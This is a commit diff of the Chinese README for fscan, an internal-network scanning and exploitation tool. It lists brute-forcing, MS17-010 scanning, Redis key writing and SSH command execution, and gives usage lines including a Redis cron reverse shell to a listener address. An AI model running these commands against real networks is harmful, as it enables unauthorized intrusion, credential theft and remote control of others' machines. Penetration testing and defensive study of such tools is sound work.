update readme

2021-03-25 23:15:10 +08:00 · 2021-03-25 23:15:10 +08:00 · 05d746bec4
parent f7989d84bf
commit 05d746bec4
1 changed files with 66 additions and 42 deletions
--- a/README.md
+++ b/README.md
@ -1,65 +1,78 @@
 # fscan

 # 简介
-一款内网扫描工具，方便一键大保健。    
-支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。  
-趁着最近有空，用go把f-scrack重构了一遍。使用go来编写，也有更好的扩展性及兼容性。  
-还在逐步增加功能，欢迎各位师傅提意见。
+一款内网综合扫描工具，方便一键大保健。    
+支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描等。  
+使用go来编写，有较好的扩展性及兼容性,编译后无需依赖库。    
+项目还在快速迭代期，每次更新代码，都会重新修改releases。  
+目前还在逐步增加功能，欢迎各位师傅提意见。

+## 主要功能
+1.信息搜集:
+* 存活探测(icmp)
+* 端口扫描

-## why
-为什么有LadonGo、x-crack 、tscan、Gscan 这些工具了还要写fscan
+2.爆破功能:
+* 各类服务爆破(ssh、smb等)
+* 数据库密码爆破(mysql、mssql、redis、psql等)  

-答：  
-因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。
+3.系统信息、漏洞扫描:  
+* 获取目标网卡信息
+* 高危漏洞扫描(ms17010等)  

-## 最近更新
-[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描  
-[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml  
-[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。  
-[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
-修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    
-[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
-[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)  
-[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。  
-[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
-[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
-[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
-[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
+4.Web探测功能:
+* webtitle探测
+* web指纹识别(常见cms、oa框架等)
+* web漏洞扫描(weblogic、st2等,支持xray的poc)
+
+5.漏洞利用:
+* redis写公钥或写计划任务
+* ssh命令执行
+
+6.其他功能:
+* 文件保存

 ## usege
 简单用法
 ``` 
-go run main.go -h 192.168.1.1/24
 fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
-fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
+fscan.exe -h 192.168.1.1/16  (B段扫描)
+```
+
+其他用法
+```
+fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
 fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
 fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
 fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
+fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
+fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
+fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
+fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
+fscan.exe -hf ip.txt  (以文件导入)
 ```
+编译命令
 ```
-h 192.168.1.1/24 (C段)  
-h 192.168.1.1/16 (B段)
-h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
-hf ip.txt  (以文件导入)
+go build -ldflags="-s -w " -trimpath
 ```

-
 完整参数
 ```
-  -Num int
+   -Num int
        poc rate (default 20)
  -c string
        exec command (ssh)
+  -cookie string
+        set poc cookie
+  -debug
+        debug mode will print more error info
  -domain string
        smb domain
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hs ip.txt
-  -it int
-        Icmp Threads nums (default 11000)
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
@ -71,7 +84,7 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
  -o string
        Outputfile (default "result.txt")
  -p string
-        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
+        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
  -ping
        using ping replace icmp
  -pocname string
@ -87,16 +100,19 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
-        Thread nums (default 200)
+        Thread nums (default 600)
  -time int
        Set timeout (default 3)
+  -u string
+        url
+  -uf string
+        urlfile
  -user string
        username
  -userf string
        username file
  -wt int
-        Set web timeout (default 3)
-
+        Set web timeout (default 5)
 ```

 ## 运行截图
@ -106,7 +122,7 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)

 ![](image/4.png)

-`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
+`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)`
 ![](image/2.png)

 `fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
@ -115,12 +131,6 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 `fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
 ![](image/2020-12-12-13-34-44.png)

-## 未来计划
-[*] 合理输出当前扫描进度  
-[*] 增加内网常见高危漏洞  
-[*] 增加高危web漏洞扫描  
-[*] 师傅们觉得有必要加的漏洞，也可以提issue
-

 ## 参考链接
 https://github.com/Adminisme/ServerScan  
@ -128,3 +138,17 @@ https://github.com/netxfly/x-crack
 https://github.com/hack2fun/Gscan  
 https://github.com/k8gege/LadonGo   
 https://github.com/jjf012/gopoc
+
+## 最近更新
+[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描  
+[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml  
+[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。  
+[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
+修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    
+[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
+[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)  
+[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。  
+[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
+[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
+[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
+[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理